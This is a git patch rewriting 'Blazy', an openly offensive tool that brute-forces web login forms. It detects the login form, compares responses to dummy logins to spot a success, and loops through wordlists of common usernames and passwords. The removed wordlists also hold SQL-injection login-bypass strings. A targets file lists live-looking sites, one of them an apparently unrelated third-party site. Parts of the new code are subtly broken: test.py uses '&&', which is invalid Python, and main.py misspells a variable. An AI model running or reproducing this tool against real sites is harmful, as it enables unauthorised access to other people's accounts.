From 347ab20a37972fb3aaf9c74c3867adf0f095a180 Mon Sep 17 00:00:00 2001 From: Somdev Sangwan Date: Mon, 28 Nov 2022 23:24:13 +0530 Subject: [PATCH] rewritten --- LICENSE | 674 --------------------- README.md | 36 -- __init__.py | 1 + blazy.py | 204 ------- core/__init__.py | 0 core/__pycache__/__init__.cpython-310.pyc | Bin 0 -> 129 bytes core/__pycache__/anamoly.cpython-310.pyc | Bin 0 -> 1946 bytes core/__pycache__/colors.cpython-310.pyc | Bin 0 -> 598 bytes core/__pycache__/config.cpython-310.pyc | Bin 0 -> 133 bytes core/__pycache__/output.cpython-310.pyc | Bin 0 -> 267 bytes core/__pycache__/parser.cpython-310.pyc | Bin 0 -> 1372 bytes core/__pycache__/requester.cpython-310.pyc | Bin 0 -> 565 bytes core/__pycache__/utils.cpython-310.pyc | Bin 0 -> 1458 bytes core/anamoly.py | 70 +++ core/colors.py | 21 + core/config.py | 1 + core/output.py | 4 + core/parser.py | 42 ++ core/requester.py | 17 + core/utils.py | 55 ++ db/passwords.txt | 14 + usernames.txt => db/usernames.txt | 5 +- main.py | 116 ++++ passwords.txt | 25 - requirements.txt | 3 - result.json | 1 + targets.txt | 3 + test.py | 41 ++ 28 files changed, 387 insertions(+), 946 deletions(-) delete mode 100644 LICENSE delete mode 100644 README.md create mode 100644 __init__.py delete mode 100644 blazy.py create mode 100644 core/__init__.py create mode 100644 core/__pycache__/__init__.cpython-310.pyc create mode 100644 core/__pycache__/anamoly.cpython-310.pyc create mode 100644 core/__pycache__/colors.cpython-310.pyc create mode 100644 core/__pycache__/config.cpython-310.pyc create mode 100644 core/__pycache__/output.cpython-310.pyc create mode 100644 core/__pycache__/parser.cpython-310.pyc create mode 100644 core/__pycache__/requester.cpython-310.pyc create mode 100644 core/__pycache__/utils.cpython-310.pyc create mode 100644 core/anamoly.py create mode 100644 core/colors.py create mode 100644 core/config.py create mode 100644 core/output.py create mode 100644 core/parser.py create mode 100644 core/requester.py create mode 100644 core/utils.py create mode 100644 db/passwords.txt rename usernames.txt => db/usernames.txt (64%) create mode 100644 main.py delete mode 100644 passwords.txt delete mode 100644 requirements.txt create mode 100644 result.json create mode 100644 targets.txt create mode 100644 test.py diff --git a/LICENSE b/LICENSE deleted file mode 100644 index 9cecc1d..0000000 --- a/LICENSE +++ /dev/null @@ -1,674 +0,0 @@ - GNU GENERAL PUBLIC LICENSE - Version 3, 29 June 2007 - - Copyright (C) 2007 Free Software Foundation, Inc. - Everyone is permitted to copy and distribute verbatim copies - of this license document, but changing it is not allowed. - - Preamble - - The GNU General Public License is a free, copyleft license for -software and other kinds of works. - - The licenses for most software and other practical works are designed -to take away your freedom to share and change the works. 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Of course, your program's commands -might be different; for a GUI interface, you would use an "about box". - - You should also get your employer (if you work as a programmer) or school, -if any, to sign a "copyright disclaimer" for the program, if necessary. -For more information on this, and how to apply and follow the GNU GPL, see -. - - The GNU General Public License does not permit incorporating your program -into proprietary programs. If your program is a subroutine library, you -may consider it more useful to permit linking proprietary applications with -the library. If this is what you want to do, use the GNU Lesser General -Public License instead of this License. But first, please read -. diff --git a/README.md b/README.md deleted file mode 100644 index 59842b6..0000000 --- a/README.md +++ /dev/null @@ -1,36 +0,0 @@ -# Blazy -Blazy is a modern login page bruteforcer. -

- -### Features -- [x] Easy target selections -- [x] Smart form and error detection -- [x] CSRF and Clickjacking Scanner -- [x] Cloudflare and WAF Detector -- [x] 90% accurate results -- [x] Checks for login bypass via SQL injection -- [ ] Multi-threading -- [ ] 100% accurate results -- [ ] Better form detection and compatibility -#### Requirements -- Beautiful Soup -- Mechanize -### Usages -Open your terminal and enter -``` -git clone https://github.com/UltimateHackers/Blazy -``` -Now enter the following command -``` -cd Blazy -``` -Lets install the required modules before running Blazy -``` -pip install -r requirements.txt -``` -Now run Blazy by entering -``` -python blazy.py -``` -Now enter your desired login page URL and Blazy will do its thing: - diff --git a/__init__.py b/__init__.py new file mode 100644 index 0000000..80efdd8 --- /dev/null +++ b/__init__.py @@ -0,0 +1 @@ +__version__ = '0.2.0-beta' \ No newline at end of file diff --git a/blazy.py b/blazy.py deleted file mode 100644 index ae99cb2..0000000 --- a/blazy.py +++ /dev/null @@ -1,204 +0,0 @@ -#!/usr/bin/env python2 -#Modules -import mechanize -import itertools -import cookielib -import sys -from bs4 import BeautifulSoup -from re import search, findall -from urllib import urlopen -from urllib2 import URLError -#Stuff related to Mechanize browser module -br = mechanize.Browser() #Shortening the call by assigning it to a varaible "br" -# set cookies -cookies = cookielib.LWPCookieJar() -br.set_cookiejar(cookies) -# Mechanize settings -br.set_handle_equiv(True) -br.set_handle_redirect(True) -br.set_handle_referer(True) -br.set_handle_robots(False) -br.set_debug_http(False) -br.set_debug_responses(False) -br.set_debug_redirects(False) -br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time = 1) -br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1'), -('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'), ('Accept-Encoding','br')] -# Banner -print """\033[1;37m ____ _ - | _ \ | | - | |_) || | __ _ ____ _ _ - | _ < | | / _` ||_ /| | | | - | |_) || || (_| | / / | |_| | - |____/ |_| \__,_|/___| \__, | - __/ | - Made with \033[91m<3\033[37m By D3V\033[1;37m |___/ - \033[0m""" -url = raw_input('\033[1;34m[?]\033[0m Enter target URL: ') #takes input from user -if 'http://' in url: - pass -elif 'https://' in url: - url = url.replace('https://', 'http://') -else: - url = 'http://' + url -try: - br.open(url, timeout=10.0) #Opens the url -except URLError as e: - url = 'https://' + url - br.open(url) -forms = br.forms() #Finds all the forms present in webpage - -headers = str(urlopen(url).headers.headers).lower() #Fetches headers of webpage -if 'x-frame-options:' not in headers: - print '\033[1;32m[+]\033[0m Heuristic found a Clickjacking Vulnerability' -if 'cloudflare-nginx' in headers: - print '\033[1;31m[-]\033[0m Target is protected by Cloudflare' -data = br.open(url).read() #Reads the response -if 'type="hidden"' not in data: - print '\033[1;32m[+]\033[0m Heuristic found a CSRF Vulnerability' - -soup = BeautifulSoup(data, 'lxml') #Pareses the response with beuatiful soup -i_title = soup.find('title') #finds the title tag -if i_title != None: - original = i_title.contents #value of title tag is assigned to 'original' - -def WAF_detector(): #WAF detection function - noise = "?=" #a payload which is noisy enough to provoke the WAF - fuzz = url + noise - res1 = urlopen(fuzz) #Opens the noise injected payload - if res1.code == 406 or res1.code == 501: #if the http response code is 406/501 - print"\033[1;31m[-]\033[1;m WAF Detected : Mod_Security" - elif res1.code == 999: #if the http response code is 999 - print"\033[1;31m[-]\033[1;m WAF Detected : WebKnight" - elif res1.code == 419: #if the http response code is 419 - print"\033[1;31m[-]\033[1;m WAF Detected : F5 BIG IP" - elif res1.code == 403: #if the http response code is 403 - print "\033[1;31m[-]\033[1;m Unknown WAF Detected" -WAF_detector() - -def wordlist_u(lst): #Loads usernames from usernames.txt - try: - with open('usernames.txt','r') as f: - for line in f: - final = str(line.replace("\n","")) - lst.append(final) - except IOError: - print "\033[1;31m[-]\033[1;m Wordlist not found!" - quit() -def wordlist_p(lst): #Loads passwords from passwords.txt - try: - with open('passwords.txt','r') as f: - for line in f: - final = str(line.replace("\n","")) - lst.append(final) - except IOError: - print"\033[1;31m[-]\033[1;m Wordlist not found!" - quit() -usernames = [] -wordlist_u(usernames) -print '\033[1;97m[>]\033[1;m Usernames loaded: %i'% len(usernames) -passwords = [] -wordlist_p(passwords) -print '\033[1;97m[>]\033[1;m Passwords loaded: %i'% + len(passwords) -def find(): #Function for finding forms - form_number = 0 - for f in forms: #Finds all the forms in the webpage - data = str(f) #Converts the response recieved to string - username = search(r'', data) #Searches for fields that accept plain text - - if username: #if such field is found - username = (username.group().split('', data) #Searchs for fields that accept password like text - - if passwd: #if such field is found - passwd = (passwd.group().split('', data) #select_o is the name of menu - - if select_o: #Proceeds to find options of menu - menu = "True" #Sets the menu to be true - options = (select_o.group().split('=')[1][:-1]) #Extracts options - print '\n\033[1;33m[!]\033[0m A drop down menu detected.' - print '\033[1;33m[!]\033[0m Menu name: ' + name #prints menu name - print '\033[1;33m[!]\033[0m Options available: ' + options #prints available options - option = raw_input('\033[1;34m[?]\033[0m Please Select an option:>> ') #Gets option from user - brute(username, passwd, menu, option, name, form_number) #Calls the bruteforce function - else: - menu = "False" #No menu is present in the form - try: - brute(username, passwd, menu, option, name, form_number) #Calls the bruteforce function - except Exception as e: - cannotUseBruteForce(username, e) - pass - else: - menu = "False" #No menu is present in the form - option = "" #Sets option to null - name = "" #Sets name to null - try: - brute(username, passwd, menu, option, name, form_number) #Calls the bruteforce function - except Exception as e: - cannotUseBruteForce(username, e) - pass - else: - form_number = form_number + 1 - pass - else: - form_number = form_number + 1 - pass - print '\033[1;31m[-]\033[0m No forms found' -def cannotUseBruteForce(username, e): - print '\r\033[1;31m[!]\033[0m Cannot use brute force with user %s.' % username - print '\r [Error: %s]' % e.message -def brute(username, passwd, menu, option, name, form_number): - for uname in usernames: - progress = 1 - print '\033[1;97m[>]\033[1;m Bruteforcing username: %s'% uname - for password in passwords: - sys.stdout.write('\r\033[1;97m[>]\033[1;m Passwords tried: %i / %i'% (progress, len(passwords))) - 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input_obj['type'] == "password": + identified['password'] = input_obj['name'] + elif not identified['username']: + identified['username'] = input_obj['name'] + else: + for input_obj in inputs: + if re.search("login|user|name", input_obj['name']): + identified['username'] = input_obj['name'] + elif input_obj['type'] == "password": + identified['password'] = input_obj['name'] + return identified + + +def prepare_request(url, form): + parsed = urlparse(url) + action_path = form['action'] + if not action_path.startswith('/'): + action_path = '/' + action_path + full_url = parsed.scheme + "://" + parsed.netloc + form['action'] + return full_url diff --git a/db/passwords.txt b/db/passwords.txt new file mode 100644 index 0000000..0d46f06 --- /dev/null +++ b/db/passwords.txt @@ -0,0 +1,14 @@ +111111 +1234 +12345 +123456 +1234567 +12345678 +abc123 +iloveyou +letmein +Password +password +qwerty +test +admin \ No newline at end of file diff --git a/usernames.txt b/db/usernames.txt similarity index 64% rename from usernames.txt rename to db/usernames.txt index 4adf18b..062a24e 100644 --- a/usernames.txt +++ b/db/usernames.txt @@ -1,5 +1,3 @@ -'or' '=' -' or true-- root admin test @@ -9,5 +7,4 @@ adm mysql user administrator -oracle -ftp \ No newline at end of file +oracle \ No newline at end of file diff --git a/main.py b/main.py new file mode 100644 index 0000000..9db96ce --- /dev/null +++ b/main.py @@ -0,0 +1,116 @@ +""" +We are creating a login bruteforcer that works +on any given webpage without any manual user input, just a url. +""" + + +import re +import sys +import argparse +import core.config as mem +from core.output import json_output +from core.requester import requester +from urllib.parse import urlparse +from core.anamoly import define, compare +from core.parser import get_login_form +from core.utils import prepare_request, identify_fields + +from core.colors import green, end + +parser = argparse.ArgumentParser() +parser.add_argument('-i', help='all kind of input', dest='input') +parser.add_argument('-oJ', help='all kind of input', dest='json_output') +parser.add_argument('-t', help='http timeout', dest='timeout', default=10) + +args = parser.parse_args() +mem.var = vars(args) + +print("\n blazy 0.2.0\n") + +usernames = [] +passwords = [] + +def gen_payload(username, password, location, inputs): + payload = {} + for input_obj in inputs: + if input_obj['name'] == location['password']: + payload[input_obj['name']] = password + elif input_obj['name'] == location['username']: + payload[input_obj['name']] = username + else: + payload[input_obj['name']] = input_obj['value'] + payload['form'] = 'submit' + return payload + +def bruteforce(url, inputs, locations, factors): + payload = {} + for user in usernames: + for password in passwords: + payload = gen_payload(user, password, locations, inputs) + response = requester(url, payload) + if compare(response, factors) != "": + return user, password, payload + return user, password, payload + +def process_url(url): + html = requester(url).text + login_form = get_login_form(html) + + if not login_form: + return '', '', '' + + full_url = prepare_request(url, login_form) + locations = identify_fields(login_form['inputs']) + payload_1 = gen_payload("gsdug", "zf89h.eVui", locations, login_form['inputs']) + response_1 = requester(full_url, payload_1) + payload_2 = gen_payload("djgug", "zf59h.eBux", locations, login_form['inputs']) + response_2 = requester(full_url, payload_2) + factors = define(response_1, response_2) + + return bruteforce(full_url, login_form['inputs'], locations, factors) + +def init_db(): + with open('./db/usernames.txt', 'r') as usernames_file: + for line in usernames_file: + usernames.append(line.rstrip('\n')) + + with open('./db/passwords.txt', 'r') as usernames_file: + for line in usernames_file: + passwords.append(line.rstrip('\n')) + +def main(): + init_db() + if re.search("^https?://", mem.var['input']): + username, password, result = process_url(mem.var['input']) + if mem.var['json_output']: + output = json_output(result) + if mem.vars['json_output'] == '-': + print(output) + quit() + with open(mem.var['json_output'], 'a+') as json_file: + json_file.write(output + "\n") + else: + with open(mem.var['input'], 'r') as url_file: + count = 0 + for line in url_file: + count += 1 + print("Progress: %i" % count, end="\r") + url = line.rstrip('\n') + if re.search("^https?://", url): + username, password, result = process_url(url) + if not username: + continue + if mem.var['json_output']: + output = json_output(result) + if mem.var['json_output'] == '-': + print(output) + quit() + with open(mem.var['json_output'], 'a+') as json_file: + json_file.write(output + "\n") + else: + print("%s>>%s %s" % (green, end, url)) + print(" %suser:%s %s" % (green, end, username)) + print(" %spass:%s %s" % (green, end, password)) + +if __name__ == '__main__': + main() diff --git a/passwords.txt b/passwords.txt deleted file mode 100644 index 0667b13..0000000 --- a/passwords.txt +++ /dev/null @@ -1,25 +0,0 @@ -'or' '=' -' or true-- -admin -123456 -password -12345678 -666666 -111111 -1234567 -qwerty -siteadmin -administrator -root -123123 -123321 -1234567890 -letmein123 -test123 -demo123 -pass123 -123qwe -qwe123 -654321 -loveyou -adminadmin123 \ No newline at end of file diff --git a/requirements.txt b/requirements.txt deleted file mode 100644 index 3993ef7..0000000 --- a/requirements.txt +++ /dev/null @@ -1,3 +0,0 @@ -mechanize -bs4 -lxml diff --git a/result.json b/result.json new file mode 100644 index 0000000..5ee2825 --- /dev/null +++ b/result.json @@ -0,0 +1 @@ +{"login": "bruh", "password": "testing", "security_level": "0", "form": "submit"} diff --git a/targets.txt b/targets.txt new file mode 100644 index 0000000..3ba84aa --- /dev/null +++ b/targets.txt @@ -0,0 +1,3 @@ +https://bwapp.hakhub.net/login.php +https://example.com +http://dramaonline.pk/search.php diff --git a/test.py b/test.py new file mode 100644 index 0000000..0f209a5 --- /dev/null +++ b/test.py @@ -0,0 +1,41 @@ +import lxml.html +import six +from lxml.html import CheckboxValues, MultipleSelectOptions, InputElement + + +def parse_input(element): + if isinstance(element, InputElement): + if element.attrib.get('type') == 'submit': + return True, None, element.attrib.get('type') + value_obj = element.value + if value_obj is None: + return False, '', element.attrib.get('type') + if isinstance(value_obj, str): + value_obj = value_obj.lstrip('\n') + if isinstance(value_obj, CheckboxValues): + value_obj = [el.value for el in value_obj.group if el.value is not None] + if isinstance(value_obj, MultipleSelectOptions): + value_obj = list(value_obj) + return False, value_obj, element.attrib.get('type') + + +def get_login_form(html): + this_form = {} + tree = lxml.html.fromstring(html) + for index in range(len(tree.forms)): + all_inputs = [] + found_password = False + for key, element in tree.forms[index].inputs.items(): + skip, value, kind = parse_input(element) + if not skip: + if kind && kind.lower() == "password": + found_password = True + all_inputs.append({'name': key, 'value': value, 'type': kind.lower()}) + if not found_password: + continue + if tree.forms[index].action: + this_form['url'] = tree.forms[index].action + this_form['method'] = tree.forms[index].method.lower() + this_form['inputs'] = all_inputs + break + return this_form